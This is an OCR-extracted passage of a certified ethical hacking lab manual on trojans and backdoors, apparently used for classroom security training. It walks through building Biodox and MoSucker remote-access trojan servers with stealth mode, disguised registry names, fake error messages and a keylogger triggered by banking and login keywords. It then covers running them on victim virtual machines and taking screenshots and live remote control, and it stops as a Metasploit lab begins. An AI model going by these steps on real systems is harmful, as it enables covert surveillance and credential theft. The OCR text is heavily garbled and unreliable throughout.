Transfer ? ? Saeen 5 WebCam Error* |biodox w a s here IP /[* S Adress: 0 Sy8tem32 O Temp Server Mode‫־‬ (• Gizli Mod > O Yardyrr Moou s Pxt 6561 6562 6563 6564 Admin | Opera tin... | Cpu | Ram Coentry active / deactive status Status : Read/... FIGURE 9 :Windows 8 Secu Warning .4 - rity 6. 1 1 Server Editor options, enter a victim ’s IP address in die IP/DNS field; 111 1 this lab we are using W indow s Server 2008 (10.0.0.13). C E H La b M anual Page 500 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 78. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs 7. Leave die rest o f die settings at dieir defaultd; to build a server click die C reate Server button. Note: IP addresses may ditter 111 your classroom labs. B d xO e S u eE itio io o p n o rc d n | H Server Editor 7 ------ !13 commuucaton □ 0 0 £ passwords manage files keyboard msn settings settings maTage‫־‬ ^ systerr nfo‫־‬maton ti fir manager jj1 commands ‫׳‬ capture j server properties ■ k>:al tools ‫*׳‬f '‫ )ס‬contact us ‫ץ‬ -IP/DfsS--Adress: 1 10.0.0 1 | 3 Msg Title : |ErfQH Message : |biodox was here I Message Icon : © 1 Name: 2 1 - |v‫־‬ ictim Connection Delay — Da| n * C dyi0 * -Registry Settings‫־‬ K ey: mssrs32 Vakje: _!‫צ‬ Connection: [6661 | Screen Capture: [6663 Transfer:|6662 | webcam Capture: [6664 OWindows OTemp Vetim W ame 0 5ystem32 ■ Server Mode- mssrs32.exe © Gizii Mod Correction ?5 Connection ® Transfer ?? Screen S WebCam | | O Yardyn‫ ־‬MoCu Port 6561 0 J_ £ UJ 6562 6563 6564 IP Adress UserNarre Computer... Admin Operatin... Cpu Status : Read/... Ram Couitry create server FIGURE 9 : BodoxMainScreen .5 Server.ex e tile w ill be created 111 its default directory: Z:CEHv8 Module 06 Trojans and BackdoorsTrojans TypesGUI TrojansBiodox Trojan. ‫׳‬ Applicator Toots | | Home 5 0 - ♦g -T Favorites E Desktop 4 Downloads ‘kl Recent places Share View B io d o x Manage « Trcjans Types ► GUITrojons ► D-odox Trojcn ► Biodox "S’ © v|C | | Scorch Biodox J4 Language M P lj9 ‫ ״‬t BIOCOX Cb tdition.exe jp U in w MSCOMCTL.OCX Libraries 0 Documents J'' Music B Pictures 0 gM S W 1 N S < X 0 C X £ res.g1 f p i / [ server.exe") ft 5ertingj.ini Videos - FIGURE 9 : Bodoxservices .5 9. C E H La b M anual Page 501 N ow switch to W indow s Server 2008 V irtual M achine, and navigate to Z:CEHv8 Module 06 Trojans and BackdoorsTrojans TypesGUI TrojansBiodox Trojan to m il die server.exe die. E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 79. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs ’ r0)or» "ypea - GUI Trojon* - 3‫׳‬odo<c Tro,0‫ - ־‬Biodox ■ n ‫׳‬ Pile edit /1eA‫׳‬ ‫־‬oote Crg»m:e ~ 1 ewfl ‫ ־־‬i t t J i F - & le p » (__ opcri a I *I Fa/orite Links tnodfi«d Ms.. I * I Typ* I• I I i^ tu n P gs 1 ‫ ־‬Docuncnts % P 1 ictures 4 I b1XO^ Or &4tor.ete p Leetre R j Music <£ m 5c <*‫׳‬c t . . ocx M ore » £MSMNSCX.OOf i^ ra g se n s.r ... .*jm-r. i. ^ 3iodo!c Trojsn J . Bkxlox i t Language J4 Pogne FIGURE 9 : Bodoxse r.e e .6 rve x 10. Double-click server.exe 111 W indow s Sender 2008 virtual m acliine, and click Run 111 die Open F ile - Secu rity W arning dialog box. ‫ ן‬Open File -Security Warning The publisher could not be verified. Are you sure you want to run this software? E Name: Publisher: Type: .. .pesGUI Trojans'Biodox Tr0jatVf310d0xserver.exe U n k no w n P u b lish e r Application From: Z:CEHv8 Module 06Trojans and Backdoors Trojan... Run • tg V Cancel This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust. How can I decide what software to run* FIGURE 9 : Runthetool .7 11. N ow switch to W indow s 8 V irtual M acliine and click die active/deactive statu s button to see die connected machines. C E H La b M anual Page 502 E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 80. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Biodox Open Source Edition Server Editor □‫------־‬■ -Fake Error Message — rScommuiicaton □ Q S passwords manage ftes ‫כ‬ Msg Tlllc ; fla msnsettjnos settings ma-iage‫׳‬ ‫־‬ O system info-maoxi ‫ #.׳‬finmanaoer ‫•. ־‬ jj‫ ׳‬commands [_jj capture server properties loal tools contact us 3 A “ ) |br-or Message: j keyboard [biodox w Message Icon : Adress: 10.0.013 - Vctim flame‫־‬ Name: Ivic Connection: [6661 | Saeen Captjre : |6663 Transfer:|66s? D^ayjiO I O 1ee. ‫ זכי‬connectioi -Regetry SewingsKey: mssrs: Windows Transfer O Yardyrr Mocu Pxt 6561 6962 ® Saeen S WebCam 0 System32 Temp •server M ode© Gizli Mod Connection S Connection | | webcam Capture: |6664 | O r connection Delay- 6563 6564 Vctom Name IP Adress User Narre Cornputcr... Admin Operatin... Cpu Ram Status : Settings saved and server created( Country active / deactive status FIGURE 9 :Bodoxopenso rceeditior .8 u 12. A fter getting connected you can view connected victim s as shown 111 die follow ing screenshot. B d xOe S uc E itio io o pn o r e d n ® ‫1 ש‬ 3 communicaton 2‫ ־‬passwords ‫'־‬ manage fles keyboard msn settinos settings maTage‫־׳‬ Q system information •$‫ ׳‬fin manager §> commands | j | capture ijj server prop»rt »c ‫ ־־‬local tools ^}) contact us 1 ‫0 0 ם‬ -----[Errofl Message : Adress: 10.0.013 Msg T itle : |biodox w a s here Message Icon ; © --- Connection: |6661 r Connection Delay — o«l»y|10 | fer ‫־‬ mssrs32 ‫צב‬ V | Saeen Captjre: |6663 | Transfer:[6662 | webcam Capture: |6€€4 | - Install Path------------------- O K ey: | Windowo O Temp r Server ModeO Yordyro Modu : mssrs32 e: :or rc net n S S ‫לי‬ S Connection Transfer Saeen WebCam 6561 I 6562 6563 6564 J/D . IP Adress_____ UsstNatifi___ CaniButfir...__ Admin_____ Qpsratin..._ Cpu _ Adrrinistr... WIN-EGB.. W Vista in 3D93 0.99 GB United. Status : d ien t Active FIGURE 9 :Bodoxopenso rceeditior .9 u 13. N ow you can perform actions w ith die victim by selecting die appropriate action tab in die left pane o f die Biodox window. 14. N ow click the setting s m anager option to view the applications running and odier application settings. C E H La b M anual Page 503 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 81. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Biodox Open Source Edition @ 01 Name Path Memory ... 0 System 0 Priority H*J cytttm keyboard fla msnsettmas 9 settings maTagy 1 apjlicatons ~| 1 ao^icaton setbnos A ex3lore‫ ׳‬setings C3 pmt ^ services 0 system information ‫ •$׳‬fun manager . jj1 commands ‫׳‬ ^ capture j server properoe; local tools W) contact us £ A Connection 5 Connection Syetam System 929792 Normal H 3 csrss.exe a 0 432 500 544 System 5701632 Normal System 7430144 Normal H•!! wmm1 t.e>e 552 System 4849664 Hiob L.-J ‫.׳‬unlogon exe 580 System 6287360 servces.exe 628 System 7188480 Normal IQ kass.exe 640 System 10821632 Normal 5llsm .exe csrss.exe High 648 System 4812800 836 System 6418432 Normal svd‫־‬ost.exe 896 System 7192576 Normal svehost.exe 992 System 9965568 Normal 1015 System 7016448 Normal 244 System 33181695 Normal 296 System 12562432 Normal 360 System 12091392 Normal iij l svchost.exe svd-ost.exe iiJdsvc.exe svcfost.exe 0 H B 0 □ 11 * ‫וזיו‬ ‫1 --------ן‬ Normal svd‫־‬ost.exe Pxt Transfer 4 23smss.exe msnags fles j PID S I (system pr... rScommuiicaton A passwords v 6962 ® Screen ® WebCam 6561 6563 6564 ? Adress User Narre Computer... Admin Admmstr... WIN-EGB... True Operatin... Cpu Status : successfully 0.99 GB United... Clear Application List FIGURE 9 : Bocloxopenso editor .9 urce 15. Y o u can also record die screenshots o f die victim by clicking die Screen Capture button. 16. C lick die Sta rt Screen Capture button to capture screenshots o f die victim ’s machine. FIGURE 9 0 screencap re .1 : m 17. Biodox displays the captured screenshot o f the victim ’s machine. C E H La b M anual Page 504 E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 82. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs V 41 * ‫ס‬ * Saeen Capture ** V x Rctydean & a 9 SL B Nr* Te*t Doa1H0w.txT FIGURE 9 1 screencap re .1 : tu 18. Sim ilarly, you can access die details o f die victim ’s machine by clicking die respective functions. L a b A n a ly s is Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posmre and exposure dirough public and tree inform ation. P LEA S E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T IO N S R E L A T E D T O T H I S LAB. T o o l/ U tility B io d o x In fo rm a tio n C o lle c te d / O b je ctive s A ch ieved O u tp u t: Record the screenshots o f the victim m achine In te rn e t C o n n ectio n R e q u ire d □ Y es 0 No P la tfo rm Su p p o rted 0 C lassro o m C E H La b M anual Page 505 0 !Labs E th ic a l H ack in g and Countenneasures Copyright © by EC-Council AH Rights Reserved. Reproduction is Stricdy Prohibited.
  • 83. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs C r e a tin g a S e r v e r U s in g t h e M oS u cker M o S u c k e r is a V is u a l B a s ic T ro ja n . A lo S u k e r's e d it s e rv e r p ro g ra m h a s a c lie n t w ith th e sam e la y o u t a s s u b S e v e n ' c lie n t. s I CON KEY [£ Z 7 V a lu a b le in fo r m a tio n ________ .y v T est vo u r L a b S c e n a r io A backdoor is a secret or unauthorized channel fo r accessing com puter system. 111 an attack scenario, hackers in stall backdoors on a m achine, once com prom ised, to access it 111 an easier m anner at later tim es. W ith the grow ing k n o w le d g e _________ ** use o f e-com m erce, w eb applications have becom e the target o f choice for W e b e x e rc is e attackers. W ith a backdoor, an attacker can virtu ally have fu ll and undetected access to your application for a long tim e. It is critical to understand the ways <‫ ־‬r • . W o r k b o o k r e v ie w backdoors can be installed and to take required preventive steps. Y o u are a security adm inistrator o f your com pany, and your job responsibilities include protecting the netw ork from Trojans and backdoors, T rojan attacks, theft ot valuable data trom the netw ork, and identity thett. L a b O b je c t iv e s The objective o f this lab is to help students learn to detect T rojan and backdoor attacks. The objectives o f the lab include: I T Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans and Backdoors ■ Creating a server and testing the netw ork for attack ■ D etecting Trojans and backdoors ■ A ttacking a netw ork using sample Trojans and docum enting all vulnerabilities and flaws detected L a b E n v ir o n m e n t To carry tins out, you need: ■ ‫י‬ C E H La b M anual Page 506 M oSucker tool located at D:CEH-ToolsCEHv8 M odule 06 T ro jan s and BackdoorsTrojans TypesG UI TrojansM oSucker A com puter running W indow s Server 2012 as host machine E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 84. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs ■ A com puter rum iing W indow Server 8 V irU ial M achine (Attacker) ■ W indow s Server 2008 running 111 V irtual M achine (Victim ) ■ A w eb browser w ith In tern et access ■ Adm inistrative privileges to run tools L a b D u r a t io n Tim e: 20 M inutes O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A Trojan is a program that contains m alicio u s or harm ful code inside apparendy harmless programming or data 111 such a w ay that it can get co n tro l and cause damage, such as ruining die hie allocation table on a hard drive. Note: The versions o f die created client or host and appearance o f die website may differ from w hat it is in die lab, but die actual process o f creating die server and die client is same as shown 111 diis lab. Lab T ask s 3 _ t a s k 11. C re a te S e rv e r w ith Pro R at2. Launch W indow s 8 V irtual M achine and navigate to Z:CEHv8 M odule 06 Trojans and BackdoorsTrojans TypesGUI TrojansM oSucker. Double-click die C reateServer.exe hie to create a server. F - p i | ‫־‬ * _ Sh “ View J ! AY Jl. ft Downloads '2Al ► GUI Trojans ► j Recent place} ^ Music Q j Vid»oc lOiterrc fi © | pi jg ns screenshots slons j . stub Documents M Pictures Search MoSuckcr . runtimK Ji Libraries Q V | <‫| | צ‬ Firewall e/ents Jl 04 ‫ש‬ MoSuckcr J tc g i Desktop ■ Manage Trcjans Types Favorites -< ‫׳‬ M oSucker Applicator Tools ‫׳‬ Home | ^ Crea:eServer.exe | MoSjckerexe j_] ReadMe.txt 1 it*m cel»rt#d 456 K2 FIGURE 1 .1 Install createServer.exe 0: 3. C E H La b M anual Page 507 1 1 the Open F ile - Secu rity W arning dialog box, click Run. 1 E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 85. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Open File ‫ ־‬Security Warning Th e publisher could not be verified. A re you sure you w ant to run this software? N m : ...T jan T e U T ja sM S ck rC a S rve x a e ro s yp sG I ro n o u e re te e r.e e Publisher U n k n o w n Publisher T e A plication yp : p F m Z EH M u 0 T ja sa dB c d o T ja sT ro : :C v8 od le 6 ro n n a k o rsV ro n ... S3 Rn u Cn l a ce T isfile d e n t h veavalid d sig atu thatverifies its h os o a igital n re p b e Y ush u onlyru so a fro p b e youtru u lish r. o o ld n ftw re m u lish rs st. H wc nI d ew atso areto ru ? o a ecid h ftw n FIGURE 1 .2 Install cre S rve .e e 0: ate e x x £ / Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans and Backdoors 4. The M oSncker Server Creator/Editor w indow appears, leave die default settings and click OK. MoSucker 3.0 Server Creator/Editor Coded by Superchachi. Contains code from Mosucker 2.2 by Krusty Compiled for Public release B on November 20/2002, VB6 (• m I w ant to c re a te a stealth trojan serv er for a victim I- Indude Msvbvm60.dll in your MoSucker server (adds 750 KB) 17 Indude mswinsock.ocx in your server (adds 50 KB) 17 Pack for minimal file size CD Recommended! CD CD MoSudcer Transport Cipher Key ‫ש‬ TWQPQJL25873IVFCSJQK13761 V Add | 2385 ‫ש‬ KB to the server. ( I w ant to c re a te a visible serv er for local testing. I w ant to edit an existing serv er 17 Start configuration after creating the server About Cancel Ok FIGURE 1 .3 Install createServer.ex 0: e 5. Use die file name server.exe and to save it 111 die same directory, click Save. C E H La b M anual Page 508 E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 86. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs & MoSucker Server C reato r. © 0 ^ Organize 0 w [ « GUI Trojans ► M oSucker Search M oSucker N ew folder * D ocum ents Date m odified Type i . AV Firewall events 9 /19 /20 12 1:37 PM File foldeJ X ci g 9 /1 9 /2 0 1 2 1 :3 7 P M File foldeJ J plugins 9/1 9 /2 0 1 2 1:37 PM File foldeJ X runtimes 9 /1 9 /2 0 1 2 1 :3 7 P M File foldeJ J . screenshots 10/1 /20 12 6:56 PM File foldeJ X- skins 9 /19 /20 12 1:37 PM File foldeJ J stub 10/1 /20 12 6:50 P M File foldeJ Jp CreateServer.exe 11/28/2002 2:59 A M Applicatia 11/22/2002 5:10 PM Apphcatio N am e J 1 Music Pictures 8 Videos H o m eg ro u p : ■ C om puter ^ Local Disk ( C ) V CEH -Tools ( 1 0 . j g | M 0 Sucker.exe ^ N etw ork File QameJ 5 Save as ty p e Executable Files (*.exe) Save “■ H id e Folders Cancel FIGURE 1 .4 SaveServer.exe 0: 6. M oSucker w ill generate a server w ith the com plete settings in die default directory. MoSucker 3.0 G eneratingserver... 100% complete Build D a te: Build Info: 11/28/2002 2:04:12 AM MoSucker 3.0 Public Release B Level Accessed: Public UPX V erifying n e c e s s a r y file p a th s P re p a rin g fir s t s tu b P re p a rin g s e c o n d s tu b P ack in g fir s t s tu b P ack in g s e c o n d s tu b M odifying file h e a d e r s FIGURE 1 .5 Install serverp g 0: ro ress 7. C lick OK 111 die Ed it Server pop-up message. Edit Server 3.0 Server created successfully! Server siz : 1 8K e 5 B. D not repackserver. o O K FIGURE 1 .6 Servercreatedsu 0: ccessfu l 1 1 the 1 M oSucker wizard, change die V ictinV s Nam e to V ictim or leave all the settings as dieir defaults. C E H La b M anual Page 509 E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 87. Module 06 - Trojans and Backdoors MoSucker 3.0 Selected Server: |2:VCEHv8 Modde 06 Trojans and BackdoorsTrojans Type [ Nm ’ot ae r A Password Server ID: Cypher Key: [ Notificabon 1 Victim's Name: f Notification 2 Server Name(s): Options Extension^): Conrectior-eort: J<y 9 g gjg 9 - Close 0 ‫ש‬ ‫ש‬ 1501704QWEYJC: 4264200TPGNDEVC TWQPOJL25873IVFCSJQK13761 |vict!m ~] kernel32,mscOnfig,winexec32,netconfig‫״‬ 0 exe,pif,bat,dliope,com,bpq,xtr,txp, ‫ש‬ 142381 ‫ש‬ I * Prevent same server multi-infections (recommended) You may select a windows icon to associate with your custom file extension/s. Fake Error Rle Properties Read Save FIGURE 1 Give dievictimm 0.7: achine details 9. N o w click K eylogge r 111 die le ft pane, and check die Enable off-line ke ylo gg e r option, and dien click Save. 10. Leave die rest o f die settings as dieir defaults. MoSucker 3.0 Selected Server: |z:CEHv8 Module 06 Trojans and BackdoorsTrojans Type [ Name/Port Password P I !Enable off-line keyioggetj C ~ Close [T] Log Filename: ‫ש‬ monitor.log Options 1 Enable Smart Logging ‫־‬ Captwn key words to trigger keylogger (separate each with a comma) ‫ש‬ hotmad,yahoo',login‫׳‬password,bankfsecurefcheckoutfregister, Keylogger Plug-ns^ 1 <1 Fake Error Fde Properties Read Save FIGURE 1 .8 Enable the keylogger 0: 11. C lick OK 111 die EditServer pop-up message. MoSucker EditServer 3.0 o Server saved successfully. Final server size: 158 KB OK FIGURE 1 .9 S 0 : erver sa file ve C EH Lab Manual Page 510 Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 88. Module 06 - Trojans and Backdoors 12. N o w switch to W indow s Server 2008 V irtu a l M acliine, and navigate to Z:CEHv8 M odule 06 Trojans and BackdoorsVTrojans TypesGUI TrojansM oS ucker to run die server.exe tile. 3 2 ^ - j* Jp 1 Si H I Pit Edl Vtew * ~odi •tep Virnt © * ■ -H » » favorite Links i AVFrmsI een3 I- ‫■־‬ ■ ° ■ I i*co £ Pitres 1 M* • l 4 | .^a‫־‬e v 1 • .1 — ^viSvcce'.sxe * _________________________I l__ ^ ^ FIGURE 10.10: click server.exe 13. D ouble-click server.exe 111 W indow s Server 2008 virtual macliine, and click Run 111 die Open File - S e cu rity W arning dialog box. x1 1 Open File - Security Warning The publisher could not be verified. Are you sure you want to run this software? Name: .. .sT 1ojans TypesGUI TrojansV'loSucker'!server.exe r Publisher: Type: U k o nP b e n n w u lish r Application From: Z : CEHv8 Module 06 Trojans and BackdoorsT 1o ja n ... r Run ‫.ן‬ f! Cancel This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust. How can I decide what software to run ‫ל‬ FIGURE 10.11: Click on Run 14. N o w switch to W indow s 8 V irtu a l M acliine and navigate to Z:CEHv8 M odule 06 Trojans and BackdoorsVTrojans TypesGUI TrojansM oS ucker to launch M oSucker.exe. 15. D ouble-cl1ckM oS ucker.exe. C EH Lab Manual Page 511 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 89. Module 06 - Trojans and Backdoors K W ‫־״‬ 1 1 Ibm c Share View‫׳‬ 1 [©(1 (*‫ * ־‬t‫*״‬jnj Types ♦ i» K Desktop <« K > Manage ► GUI Trojans ► MoSucker AY F rewa 1e/ents -{ Favorite M oSucker -pp11:a to r took v C |Scorch MoSuckcr fi | - J! 5erver.exe M c9 6Downloads J ffil Rccent plates p ljg ns 1 runtim e £ saeensnocs ^ slons ^gi Libraries stub H ] Documents $ C rea:eServer.exe Music [K J Pictures ^M oSudem e] !HI Videos j | ReadMe.txt 1 items 1 1 item selerted 3.08 MB £ 5, FIGURE 10.12: dick on M osuker.exe 16. 1 1 the O pen File —Security W arning dialog box, click Run to launch 1 MoSucker. Open File - Security Warning The publisher could not be verified. Are you sure you want to run this software? S3 Name: ...rsVTrojans TypesGUI TrojansMoSuckerMoSucker.exe Publisher Unknown Publisher Type: Application From: Z:CEHv8 Module 06 Trojans and BackdoorsVTrojans T... Run Cancel This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust. How can I decide what software to run? FIGURE 10.13: Run die applicatin 17. The M oSucker main w in d o w appears, as shown 111 die fo llo w in g figure. 10.0.012 Misc stuff Infotmation File related System Spy related Fun stuff I Fun stuff II Live capture ][10005 J u iiu u i.m o s u c h c r . t K * 0G FIGURE 10.14: M osucher m window ain C EH Lab Manual Page 512 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 90. Module 06 - Trojans and Backdoors 18. E nter tlie IP address o f die v ic tim and p o rt num ber as you noted at die time o f server configuration, and dien click Connect. 19. 1 1 tliis lab, we have noted W indow s Server 2008 virtual machine’s IP 1 address (10.0.0.13) and p o rt number: 4288. N ote: These m ight d iffe r 111 your classroom labs. FIGURE 10.15: connect to victimm achine 20. N o w die C onnect button automatically turns to D isconnect after getting connected w id i die v ic tim machine as shown 111 the follo w in g screenshot. version 3.0 FIGURE 10.16: connectionestablished 21. N o w click M isc s tu ff 111 die le ft pane, w hich shows different options fro m w h ich an attacker can use to perform actions fro m liis or her system. C EH Lab Manual Page 513 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 91. Module 06 - Trojans and Backdoors '‫׳‬A bout _ | I& T ools dem on stra te d in th is lab are a va ilab le in D:CEHToolsCEHv8 M odule 06 Trojans and B ackdoors FIGURE 10 7 settingserver options .1 : 22. Y o u can also access the v ic tim ’s machine rem otely by clicking Live ca p tu re 111 the le ft pane. 23. 1 1 the Live ca p tu re o p tion click S tart, w hich w ill open the remote desktop 1 o f a v ic tim ’s machine. ‫ ׳‬A b o u t' | 4288 1 Disconnect 1 Options ] s g 1 1 Misc stuff Information File related System Spy related Fun stuff I Fun stuff II Live capture Start Settings JI& _ ~x] Q make screenshot Make screenshot JPEG Quality: * • • • 20% 30% 40% 50% • • • O 60% 70% 80% 90% & oi£ FIGURE 10.18: start capturing 24. The remote desktop connection o l die v ic tim ’s machine is shown 111 die fo llo w in g tigiire. C EH Lab Manual Page 514 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 92. Module 06 - Trojans and Backdoors Remote administration mode sssei sssa&i RA mode options Resi2 windo-v to 4:3 e JPG Quality 1 Delay in ms | W W W V '▼ 1000 Send mouseclicks Send pressed keys Send mousemoves Autollpdate pics U Fullscreen FIGURE 10.19: capturingvictimm achine 25. Y o u can access tiles, m o d ify die files, and so on in dns mode. RA mode options r * Rem10te administration mode w *> Resize window to 4:31 W W 1 “ W ▼j I j Delay in ms | 1 ! JP G Quality 1 90% 1000 Send mouseclcks Send pressed Leys Send mDusemoves Autollpdate pics Fullscrccp J ____ ^ :T t- o w n .a c E K‫־‬ 1« C‫־־‬ f■ c* & Z Z ----- Crcre:5FHB ► * *‫י־יי־‬ ■ o ® 1• M 1 o; FIGURE 10.20: capturingvictimm achine 26. Similarly, you can access die details o f die v ic tim ’s machine by clicking die respective functions. L a b A n a ly s is Analyze and docum ent die results related to die lab exercise. G ive your opinion on your target’s security‫ ״‬postare and exposure through public and free inform ation. C EH Lab Manual Page 515 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 93. Module 06 - Trojans and Backdoors P L E A S E T A L K T O Y O U R IN S T R U C T O R IF Y O U H A V E Q U E S T IO N S R E L A T E D T O T H IS L A B . T o o l/U tility M osucker In fo r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d O u tp u t: R ecord the screenshots o f the v ic tim ’s m achine Q u e s t io n s 1. Evaluate and examine various methods to connect to victim s i f they are 111 different cities o r countries. □ Y es 0 No P la tfo r m S u p p o rte d 0 C la s s ro o m C EH Lab Manual Page 516 0 !Labs Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 94. Module 06 - Trojans and Backdoors H a c k W in d o w s 7 U s in g M e ta s p lo it M etasploit Fra wen ork is a toolfor developing and executing exploit code against a remote target machine. I CON KEY L a b S c e n a r io Z^7 Valuable[ information____ Large com panies are co m m o n targets fo r hackers and attackers o f various kinds . * Testyour ‫י‬ ‫׳‬ knowledge_____ and fro m th e ir critica l I T in frastructure. Based 011 the fu n c tio n a lity o f the T ro ja n w e can safely surmise th a t the in te n t o f the T ro ja n is to open a backdoor e W eb e e c s * xrie 011 a co m prom ised com puter, allo w in g a rem ote attacker to m o n ito r a ctivity and Q Workbook review£ steal in fo rm a tio n fro m the com prom ised com puter. O nce installed inside a corporate n e tw o rk , the backdoo r feature o f the T ro ja n can also allo w the and it is n o t u n c o m m o n fo r these companies to be actively m o n ito rin g tra ffic to attacker to use the in itia lly co m prom ised co m p u te r as a springboard to launch fu rth e r forays in to the rest o f the in fra stru ctu re , m eaning th a t the w ealth o f in fo rm a tio n that m ay be stolen could p o te n tia lly be far greater than th a t existing 011 a single m achine. A basic p rin c ip le w ith all m alicious program s is that they need user su p p o rt to do the damage to a com puter. T h a t is the reason w h y T ro ja n horses try to deceive users by show ing them some o th e r fo rm o f email. B a ckdo o r program s are used to gam unauthorized access to systems and backdo o r softw are is used by hackers to gain access to systems so that they can send 111 the m alicious softw are to that p a rticular system. Successful attacks by the hacker 01‫ ־‬attacker in fe c tin g the target e n viro n m e n t w ith a custom ized T ro ja n horse (backdoor) determ ines exploitable holes 111 the cu rre n t security system. Y o u are a security ad m in istra to r o f y o u r com pany, and y o u r job responsibilities include p ro te c tin g the n e tw o rk fro m T rojans and backdoors, T ro ja n attacks, th e ft o f valuable data fro m the n e tw o rk, and id e n tity the ft. & T ools d e m o nstra te d in th is lab are a va ilab le in D:CEHToolsCEHv8 M odule 06 Trojans and B ackdoors C EH Lab Manual Page 517 L a b O b je c t iv e s T he objective o f tins lab is to help students learn to detect T ro ja n and backdoor attacks. T he objectives o f the lab include: ■ C reating a server and testing the n e tw o rk fo r attack Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 95. Module 06 - Trojans and Backdoors ■ A tta c k in g a n e tw o rk using sample backdoo r and m o n ito r the system a ctivity L a b E n v ir o n m e n t T o cany tins out, you need: ■ A com puter running W indow S erver 2012 ‫י‬ B a c k tra c k 5 r3 running in V irtu a l m achine ■ W indow s7 running 111 virtual machine (V ictim machine) ■ A w eb browser w ith In te rn e t access ■ A dm inistrative privileges to nan tools L a b D u r a t io n Tim e: 20 M inutes O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A T rojan is a program that contains m a lic io u s o r harm ful code inside apparently harmless program m ing o r data 111 such a way that it can g e t c o n tro l and cause damage, such as ru in in g die hie allocation table on a hard drive. Lab T ask s s d T A S K 1 C reate Sever C onnection 1. Start B a c k T ra c k 5 virU ia l m achine. 2. O pe n the te rm in a l console by navigating to A p p lic a tio n ^ B a c k T ra c k ‫ ^־־‬E x p lo ita tio n T o o ls ‫ ^־־‬N e tw o rk E x p lo ita tio n T o o ls ‫ ^־־‬M e ta s p lo it F ra m e w o rk ‫ ^־־‬m s fc o n s o le ,y Applications Places System | Accessories ^ d L IUC Oct 231 0:03 ‫ ״‬AM ► Backltack : , f Graphic* ‫ !*> ׳‬Oathefing Vulnerability Assessment Internet ► ► . K Network Exploitation Tbols ‫ .! > ־׳‬Cisco Attacks ► i l l Office ► ^ ‫> </ ״‬ § ► .1 . Fast-"H‫־‬ ack ► ^ ► B Maintaining Access » ^ Database Expl• ^ armitage iH !^ ‫ ״‬Sound & Video Openyour term inal (CTRL + ALT +1) 31 type 1d m sfvenom-h to viewthe availableoptions for diis tooL ► ■0 Exploitation Ibols ► » W ireless Explo ^ m sfdi if-. SAP Exploitation f l f System Tools ► ^ RFID Tools ► 9 Social Engmee ^ msfconsole ^ 5 ► a Stress Testing ‫־״‬ Physical Explo ^ msfupdate ► Open Source E 3b. start msfpro Other Wine Pnvilege Escalation Reverse Engineenng r f - Forensics ^ jP ? Exploitation Tools Reporting Tools M etasploit Framework ► » isr-evilgrade netoear-telnetenable term ineter V Services Miscellaneous << * m _ ‫—׳‬ ‫י‬ , ‫כ‬ ‫א‬ back track [Create Sim ple Exploit... C EH Lab Manual Page 518 Ethical Hacking and Countenneasures Copyright © by EC-Council AH Rights Reserved. Reproduction is Stricdy Prohibited.
